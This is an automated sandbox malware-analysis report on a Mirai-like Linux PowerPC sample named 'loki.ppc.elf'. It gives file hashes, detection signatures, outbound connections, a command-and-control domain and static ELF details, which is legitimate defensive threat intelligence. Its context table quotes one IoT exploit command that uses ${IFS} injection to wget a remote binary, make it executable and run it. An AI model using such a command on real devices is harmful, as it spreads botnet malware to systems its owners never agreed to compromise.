Edit tour

Linux Analysis Report
loki.ppc.elf

Overview

General Information

Sample name:	loki.ppc.elf
Analysis ID:	1594507
MD5:	d1cbdd91c6a1e3c22f1b7c397bb0a7bc
SHA1:	cd13f71e298b436428a8e056943c2f2a82750ab6
SHA256:	565dda6988182ccd8376d7df0dd3af386e78a89b0065f99ea544a4d9d4e1ec36
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Detected TCP or UDP traffic on non-standard ports

Sample has stripped symbol table

Sample listens on a socket

Suricata IDS alerts with low severity for network traffic

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1594507
Start date and time:	2025-01-19 03:52:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	loki.ppc.elf
Detection:	MAL
Classification:	mal48.linELF@0/0@1/0

Runtime Messages

Command:	/tmp/loki.ppc.elf
PID:	5434
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	suka
Standard Error:

Process Tree

system is lnxubuntu20

loki.ppc.elf (PID: 5434, Parent: 5359, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/loki.ppc.elf

loki.ppc.elf New Fork (PID: 5436, Parent: 5434)

loki.ppc.elf New Fork (PID: 5438, Parent: 5434)

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

ET COMPROMISED Known Compromised or Hostile Host Traffic group 18

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T03:52:57.822655+0100	2500034	2	Misc Attack	83.222.191.90	13566	192.168.2.13	42836	TCP

Joe Sandbox Signatures

• AV Detection
• Networking
• System Summary
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: loki.ppc.elf

ReversingLabs: Detection: 26%

Source: global traffic	TCP traffic: 192.168.2.13:45480 -> 83.222.143.218:13566
Source: global traffic	TCP traffic: 192.168.2.13:43424 -> 83.222.152.210:13566
Source: global traffic	TCP traffic: 192.168.2.13:56100 -> 83.222.129.82:13566
Source: global traffic	TCP traffic: 192.168.2.13:37794 -> 83.222.162.35:13566
Source: global traffic	TCP traffic: 192.168.2.13:43684 -> 83.222.77.61:13566
Source: global traffic	TCP traffic: 192.168.2.13:35088 -> 83.222.255.25:13566
Source: global traffic	TCP traffic: 192.168.2.13:39514 -> 83.222.80.100:13566
Source: global traffic	TCP traffic: 192.168.2.13:35214 -> 83.222.63.114:13566
Source: global traffic	TCP traffic: 192.168.2.13:33640 -> 83.222.36.180:13566
Source: global traffic	TCP traffic: 192.168.2.13:60708 -> 83.222.37.148:13566
Source: global traffic	TCP traffic: 192.168.2.13:53760 -> 83.222.206.240:13566
Source: global traffic	TCP traffic: 192.168.2.13:39412 -> 83.222.148.57:13566
Source: global traffic	TCP traffic: 192.168.2.13:39638 -> 83.222.175.144:13566
Source: global traffic	TCP traffic: 192.168.2.13:37540 -> 83.222.112.243:13566
Source: global traffic	TCP traffic: 192.168.2.13:54900 -> 83.222.40.150:13566
Source: global traffic	TCP traffic: 192.168.2.13:57254 -> 83.222.106.184:13566
Source: global traffic	TCP traffic: 192.168.2.13:33838 -> 83.222.113.2:13566
Source: global traffic	TCP traffic: 192.168.2.13:56348 -> 83.222.138.242:13566
Source: global traffic	TCP traffic: 192.168.2.13:33758 -> 83.222.84.45:13566
Source: global traffic	TCP traffic: 192.168.2.13:36824 -> 83.222.21.162:13566
Source: global traffic	TCP traffic: 192.168.2.13:48348 -> 83.222.106.20:13566
Source: global traffic	TCP traffic: 192.168.2.13:51564 -> 83.222.187.186:13566
Source: global traffic	TCP traffic: 192.168.2.13:37752 -> 83.222.120.250:13566
Source: global traffic	TCP traffic: 192.168.2.13:53896 -> 83.222.44.157:13566
Source: global traffic	TCP traffic: 192.168.2.13:41010 -> 83.222.175.81:13566
Source: global traffic	TCP traffic: 192.168.2.13:42486 -> 83.222.49.125:13566
Source: global traffic	TCP traffic: 192.168.2.13:46094 -> 83.222.66.197:13566
Source: global traffic	TCP traffic: 192.168.2.13:56322 -> 83.222.182.241:13566
Source: global traffic	TCP traffic: 192.168.2.13:59254 -> 83.222.85.39:13566
Source: global traffic	TCP traffic: 192.168.2.13:37618 -> 83.222.229.126:13566
Source: global traffic	TCP traffic: 192.168.2.13:54974 -> 83.222.189.79:13566
Source: global traffic	TCP traffic: 192.168.2.13:43248 -> 83.222.54.46:13566
Source: global traffic	TCP traffic: 192.168.2.13:60360 -> 83.222.82.192:13566
Source: global traffic	TCP traffic: 192.168.2.13:46042 -> 83.222.32.166:13566
Source: global traffic	TCP traffic: 192.168.2.13:37920 -> 83.222.237.53:13566
Source: global traffic	TCP traffic: 192.168.2.13:32796 -> 83.222.72.87:13566
Source: global traffic	TCP traffic: 192.168.2.13:36602 -> 83.222.74.4:13566
Source: global traffic	TCP traffic: 192.168.2.13:48868 -> 83.222.17.194:13566
Source: global traffic	TCP traffic: 192.168.2.13:51984 -> 83.222.254.61:13566
Source: global traffic	TCP traffic: 192.168.2.13:34680 -> 83.222.95.173:13566
Source: global traffic	TCP traffic: 192.168.2.13:44624 -> 83.222.143.144:13566
Source: global traffic	TCP traffic: 192.168.2.13:44806 -> 83.222.43.209:13566
Source: global traffic	TCP traffic: 192.168.2.13:34100 -> 83.222.86.225:13566
Source: global traffic	TCP traffic: 192.168.2.13:34360 -> 83.222.194.171:13566
Source: global traffic	TCP traffic: 192.168.2.13:35410 -> 83.222.8.167:13566
Source: global traffic	TCP traffic: 192.168.2.13:37940 -> 83.222.41.198:13566
Source: global traffic	TCP traffic: 192.168.2.13:37922 -> 83.222.247.95:13566
Source: global traffic	TCP traffic: 192.168.2.13:36418 -> 83.222.244.73:13566
Source: global traffic	TCP traffic: 192.168.2.13:54926 -> 83.222.32.21:13566
Source: global traffic	TCP traffic: 192.168.2.13:46276 -> 83.222.239.13:13566
Source: global traffic	TCP traffic: 192.168.2.13:58912 -> 83.222.74.56:13566
Source: global traffic	TCP traffic: 192.168.2.13:43104 -> 83.222.101.148:13566
Source: global traffic	TCP traffic: 192.168.2.13:50650 -> 83.222.60.118:13566
Source: global traffic	TCP traffic: 192.168.2.13:53506 -> 83.222.87.58:13566
Source: global traffic	TCP traffic: 192.168.2.13:56468 -> 83.222.180.182:13566
Source: global traffic	TCP traffic: 192.168.2.13:57750 -> 83.222.232.67:13566
Source: global traffic	TCP traffic: 192.168.2.13:39222 -> 83.222.71.19:13566
Source: global traffic	TCP traffic: 192.168.2.13:36050 -> 83.222.20.157:13566
Source: global traffic	TCP traffic: 192.168.2.13:55966 -> 83.222.244.214:13566
Source: global traffic	TCP traffic: 192.168.2.13:42352 -> 83.222.72.253:13566
Source: global traffic	TCP traffic: 192.168.2.13:33100 -> 83.222.126.114:13566
Source: global traffic	TCP traffic: 192.168.2.13:49972 -> 83.222.195.117:13566
Source: global traffic	TCP traffic: 192.168.2.13:53482 -> 83.222.209.183:13566
Source: global traffic	TCP traffic: 192.168.2.13:54090 -> 83.222.190.241:13566
Source: global traffic	TCP traffic: 192.168.2.13:58102 -> 83.222.204.173:13566
Source: global traffic	TCP traffic: 192.168.2.13:33504 -> 83.222.255.23:13566
Source: global traffic	TCP traffic: 192.168.2.13:54868 -> 83.222.229.100:13566
Source: global traffic	TCP traffic: 192.168.2.13:60878 -> 83.222.171.33:13566
Source: global traffic	TCP traffic: 192.168.2.13:58142 -> 83.222.218.2:13566
Source: global traffic	TCP traffic: 192.168.2.13:42224 -> 83.222.92.142:13566
Source: global traffic	TCP traffic: 192.168.2.13:39946 -> 83.222.185.68:13566
Source: global traffic	TCP traffic: 192.168.2.13:54224 -> 83.222.209.0:13566
Source: global traffic	TCP traffic: 192.168.2.13:34506 -> 83.222.87.229:13566
Source: global traffic	TCP traffic: 192.168.2.13:52768 -> 83.222.157.75:13566
Source: global traffic	TCP traffic: 192.168.2.13:45296 -> 83.222.188.229:13566
Source: global traffic	TCP traffic: 192.168.2.13:46180 -> 83.222.72.58:13566
Source: global traffic	TCP traffic: 192.168.2.13:45092 -> 83.222.87.11:13566
Source: global traffic	TCP traffic: 192.168.2.13:60528 -> 83.222.175.41:13566
Source: global traffic	TCP traffic: 192.168.2.13:40924 -> 83.222.195.109:13566
Source: global traffic	TCP traffic: 192.168.2.13:55062 -> 83.222.26.143:13566
Source: global traffic	TCP traffic: 192.168.2.13:33650 -> 83.222.26.25:13566
Source: global traffic	TCP traffic: 192.168.2.13:57620 -> 83.222.166.0:13566
Source: global traffic	TCP traffic: 192.168.2.13:46276 -> 83.222.125.82:13566
Source: global traffic	TCP traffic: 192.168.2.13:38084 -> 83.222.33.88:13566
Source: global traffic	TCP traffic: 192.168.2.13:59930 -> 83.222.84.125:13566
Source: global traffic	TCP traffic: 192.168.2.13:51128 -> 83.222.230.13:13566
Source: global traffic	TCP traffic: 192.168.2.13:47360 -> 83.222.193.184:13566
Source: global traffic	TCP traffic: 192.168.2.13:41722 -> 83.222.13.24:13566
Source: global traffic	TCP traffic: 192.168.2.13:42836 -> 83.222.191.90:13566

Source: /tmp/loki.ppc.elf (PID: 5434)

Socket: 127.0.0.1:14435

Jump to behavior

Source: Network traffic

Suricata IDS: 2500034 - Severity 2 - ET COMPROMISED Known Compromised or Hostile Host Traffic group 18 : 83.222.191.90:13566 -> 192.168.2.13:42836

Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.143.218
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.143.218
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.152.210
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.152.210
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.152.210
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.152.210
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.129.82
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.129.82
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.162.35
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.77.61
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.255.25
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.162.35
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.77.61
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.255.25
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.255.25
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.80.100
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.63.114
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.255.25
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.80.100
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.63.114
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.36.180
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.37.148
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.206.240
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.36.180
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.148.57
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.37.148
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.175.144
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.206.240
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.112.243
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.148.57
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.175.144
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.40.150
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.106.184
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.112.243
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.40.150
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.113.2
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.106.184
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.138.242
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.84.45
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.113.2
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.21.162
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.138.242
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.84.45
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.106.20
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.187.186
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.120.250
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.21.162
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.106.20
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.44.157
Source: unknown	TCP traffic detected without corresponding DNS query: 83.222.187.186

Source: global traffic

DNS traffic detected: DNS query: secure-network-rebirthltd.ru

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal48.linELF@0/0@1/0

Source: /tmp/loki.ppc.elf (PID: 5434)

Queries kernel information via 'uname':

Jump to behavior

Source: loki.ppc.elf, 5434.1.000055df3de7f000.000055df3df2f000.rw-.sdmp, loki.ppc.elf, 5436.1.000055df3de7f000.000055df3df0e000.rw-.sdmp	Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: loki.ppc.elf, 5434.1.000055df3de7f000.000055df3df2f000.rw-.sdmp, loki.ppc.elf, 5436.1.000055df3de7f000.000055df3df0e000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/ppc
Source: loki.ppc.elf, 5434.1.00007ffef6a5a000.00007ffef6a7b000.rw-.sdmp, loki.ppc.elf, 5436.1.00007ffef6a5a000.00007ffef6a7b000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc
Source: loki.ppc.elf, 5434.1.00007ffef6a5a000.00007ffef6a7b000.rw-.sdmp, loki.ppc.elf, 5436.1.00007ffef6a5a000.00007ffef6a7b000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-ppc/tmp/loki.ppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/loki.ppc.elf

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
loki.ppc.elf	26%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
secure-network-rebirthltd.ru	83.222.191.90	true	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
83.222.26.143	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
83.222.193.184	unknown	Russian Federation	6854	SYNTERRA-ASRU	false
83.222.21.162	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
83.222.112.243	unknown	Russian Federation	42632	MNOGOBYTE-ASMoscowRussiaRU	false
83.222.86.225	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.71.19	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.63.114	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.138.242	unknown	Switzerland	31736	SENSELAN-ASsenseLANGmbHCH	false
83.222.185.68	unknown	Bulgaria	43561	NET1-ASBG	false
83.222.129.82	unknown	Switzerland	31736	SENSELAN-ASsenseLANGmbHCH	false
83.222.204.173	unknown	Russian Federation	6854	SYNTERRA-ASRU	false
83.222.143.144	unknown	Switzerland	31736	SENSELAN-ASsenseLANGmbHCH	false
83.222.44.157	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.244.73	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.187.186	unknown	Bulgaria	43561	NET1-ASBG	false
83.222.195.109	unknown	Russian Federation	6854	SYNTERRA-ASRU	false
83.222.84.45	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.188.229	unknown	Bulgaria	43561	NET1-ASBG	false
83.222.255.25	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.255.23	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.92.142	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.60.118	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.84.125	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.101.148	unknown	Russian Federation	42632	MNOGOBYTE-ASMoscowRussiaRU	false
83.222.74.4	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.237.53	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.190.241	unknown	Bulgaria	43561	NET1-ASBG	false
83.222.189.79	unknown	Bulgaria	43561	NET1-ASBG	false
83.222.32.21	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.244.214	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.175.144	unknown	Bulgaria	12615	GCN-ASGCNAD-SofiaBulgariaBG	false
83.222.74.56	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.229.126	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.49.125	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.95.173	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.209.183	unknown	Russian Federation	6854	SYNTERRA-ASRU	false
83.222.80.100	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.175.81	unknown	Bulgaria	12615	GCN-ASGCNAD-SofiaBulgariaBG	false
83.222.26.25	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
83.222.247.95	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.87.229	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.175.41	unknown	Bulgaria	12615	GCN-ASGCNAD-SofiaBulgariaBG	false
83.222.152.210	unknown	Switzerland	31736	SENSELAN-ASsenseLANGmbHCH	false
83.222.166.0	unknown	Bulgaria	12615	GCN-ASGCNAD-SofiaBulgariaBG	false
83.222.157.75	unknown	Switzerland	31736	SENSELAN-ASsenseLANGmbHCH	false
83.222.126.114	unknown	Russian Federation	47328	TRI-ASTrueRecordsIncES	false
83.222.171.33	unknown	Bulgaria	12615	GCN-ASGCNAD-SofiaBulgariaBG	false
83.222.148.57	unknown	Switzerland	31736	SENSELAN-ASsenseLANGmbHCH	false
83.222.40.150	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.206.240	unknown	Russian Federation	6854	SYNTERRA-ASRU	false
83.222.72.87	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.209.0	unknown	Russian Federation	6854	SYNTERRA-ASRU	false
83.222.180.182	unknown	Bulgaria	205872	EXTRANET-ASBG	false
83.222.33.88	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.254.61	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.43.209	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.85.39	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.194.171	unknown	Russian Federation	6854	SYNTERRA-ASRU	false
83.222.41.198	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.77.61	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.66.197	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.87.58	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.8.167	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
83.222.87.11	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.230.13	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.113.2	unknown	Russian Federation	42632	MNOGOBYTE-ASMoscowRussiaRU	false
83.222.232.67	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.120.250	unknown	Russian Federation	42632	MNOGOBYTE-ASMoscowRussiaRU	false
83.222.37.148	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.32.166	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.36.180	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.191.90	secure-network-rebirthltd.ru	Bulgaria	43561	NET1-ASBG	false
83.222.125.82	unknown	Russian Federation	47328	TRI-ASTrueRecordsIncES	false
83.222.13.24	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
83.222.72.253	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.182.241	unknown	Bulgaria	205872	EXTRANET-ASBG	false
83.222.218.2	unknown	Russian Federation	25159	SONICDUO-ASRU	false
83.222.106.20	unknown	Russian Federation	42632	MNOGOBYTE-ASMoscowRussiaRU	false
83.222.72.58	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false
83.222.106.184	unknown	Russian Federation	42632	MNOGOBYTE-ASMoscowRussiaRU	false
83.222.229.100	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.162.35	unknown	Bulgaria	31037	WAVENETLB	false
83.222.195.117	unknown	Russian Federation	6854	SYNTERRA-ASRU	false
83.222.54.46	unknown	Luxembourg	8632	LOL-ASluLU	false
83.222.20.157	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
83.222.239.13	unknown	United Kingdom	13768	COGECO-PEER1CA	false
83.222.17.194	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
83.222.143.218	unknown	Switzerland	31736	SENSELAN-ASsenseLANGmbHCH	false
83.222.82.192	unknown	Russian Federation	16285	ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRU	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
83.222.185.68	Tyltvc4Yuk.elf	Get hash	malicious	Mirai	Browse	/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://193.23.55.21/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
83.222.21.162	Kloki.arm7.elf	Get hash	malicious	Mirai	Browse
83.222.255.25	loki.i686.elf	Get hash	malicious	Unknown	Browse
83.222.63.114	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse
83.222.84.45	Kloki.arm5.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
secure-network-rebirthltd.ru	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.i686.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	loki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.mips.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	loki.mips.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.sh4.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	loki.arm7.elf	Get hash	malicious	Mirai	Browse	83.222.191.90
	Kloki.i486.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.ppc.elf	Get hash	malicious	Unknown	Browse	83.222.191.90

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MASTERHOST-ASMoscowRussiaRU	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse	83.222.8.97
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.20.238
	Kloki.i686.elf	Get hash	malicious	Unknown	Browse	83.222.23.89
	loki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.23.89
	Kloki.mips.elf	Get hash	malicious	Unknown	Browse	83.222.31.69
	loki.mips.elf	Get hash	malicious	Unknown	Browse	83.222.9.65
	Kloki.sh4.elf	Get hash	malicious	Unknown	Browse	83.222.28.56
	loki.arm7.elf	Get hash	malicious	Mirai	Browse	83.222.9.29
	Kloki.i486.elf	Get hash	malicious	Unknown	Browse	83.222.15.96
	Kloki.ppc.elf	Get hash	malicious	Unknown	Browse	83.222.17.204
SYNTERRA-ASRU	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse	83.222.207.75
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.192.22
	Kloki.i686.elf	Get hash	malicious	Unknown	Browse	83.222.204.106
	loki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.204.106
	Kloki.mips.elf	Get hash	malicious	Unknown	Browse	83.222.210.211
	loki.mips.elf	Get hash	malicious	Unknown	Browse	83.222.195.162
	Kloki.sh4.elf	Get hash	malicious	Unknown	Browse	83.222.195.159
	loki.arm7.elf	Get hash	malicious	Mirai	Browse	83.222.196.148
	Kloki.i486.elf	Get hash	malicious	Unknown	Browse	83.222.194.13
	Kloki.ppc.elf	Get hash	malicious	Unknown	Browse	83.222.195.110
MASTERHOST-ASMoscowRussiaRU	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse	83.222.8.97
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.20.238
	Kloki.i686.elf	Get hash	malicious	Unknown	Browse	83.222.23.89
	loki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.23.89
	Kloki.mips.elf	Get hash	malicious	Unknown	Browse	83.222.31.69
	loki.mips.elf	Get hash	malicious	Unknown	Browse	83.222.9.65
	Kloki.sh4.elf	Get hash	malicious	Unknown	Browse	83.222.28.56
	loki.arm7.elf	Get hash	malicious	Mirai	Browse	83.222.9.29
	Kloki.i486.elf	Get hash	malicious	Unknown	Browse	83.222.15.96
	Kloki.ppc.elf	Get hash	malicious	Unknown	Browse	83.222.17.204

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.189240208223776
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	loki.ppc.elf
File size:	46'968 bytes
MD5:	d1cbdd91c6a1e3c22f1b7c397bb0a7bc
SHA1:	cd13f71e298b436428a8e056943c2f2a82750ab6
SHA256:	565dda6988182ccd8376d7df0dd3af386e78a89b0065f99ea544a4d9d4e1ec36
SHA512:	55104ba1d6e1c4b08a583c28f2d7f4ac796fbeddf5c8fbd42e267e8dc172d3e8622e397c021c86ebde437b6c8c1c23f0cb9105463fe9b3b34ad6d153595330f6
SSDEEP:	768:JmzroEN8npRpJeDVEjiowCvDXFzkUsgAoPKzfQMty/ZbIITm3wVvR:UnoEKpIZCV/jRkr1oOQMt4bImm3evR
TLSH:	B4235D42721C0A57D4A75AB0393F56E083FEA9A030F4F688251F9B5A8275F3611C2FDE
File Content Preview:	.ELF...........................4.........4. ...(.......................................................T............dt.Q.............................!..\|......$H...H..a...$8!. \|...N.. .!..\|.......?.............../...@..\?........+../...A..$8...})......N..

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	PowerPC
